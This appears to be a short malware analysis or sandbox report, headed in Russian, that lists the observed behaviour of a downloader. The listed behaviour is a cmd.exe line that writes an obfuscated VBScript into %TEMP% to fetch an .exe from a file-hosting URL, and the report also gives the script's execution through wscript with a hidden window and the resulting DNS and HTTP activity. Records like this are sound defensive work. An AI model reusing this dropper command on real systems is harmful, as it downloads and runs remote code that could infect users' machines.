Техническая информация
- '<SYSTEM32>\cmd.exe' /c cd %TEMP% & @ECHO S3m= "http://a.pomf.cat/iugavu.exe">>Z5v.VBS &@ECHO K3s = R7c("KHM_Y3J]J")>>Z5v.VBS &@ECHO Set C5p = CreateObject(R7c("RX]RQ73]RQMYYU"))>>Z5v.VBS &@ECHO C5p.Open R7c("LJY")...
- %TEMP%\z5v.vbs
- %TEMP%\z5v.vbs
- 'a.##mf.cat':80
- http://a.##mf.cat/iugavu.exe
- DNS ASK a.##mf.cat
- '<SYSTEM32>\wscript.exe' "%TEMP%\Z5v.VBS"
- '<SYSTEM32>\cmd.exe' /c cd %TEMP% & @ECHO S3m= "http://a.pomf.cat/iugavu.exe">>Z5v.VBS &@ECHO K3s = R7c("KHM_Y3J]J")>>Z5v.VBS &@ECHO Set C5p = CreateObject(R7c("RX]RQ73]RQMYYU"))>>Z5v.VBS &@ECHO C5p.Open R7c("LJY")...' (со скрытым окном)
- '<SYSTEM32>\timeout.exe' 13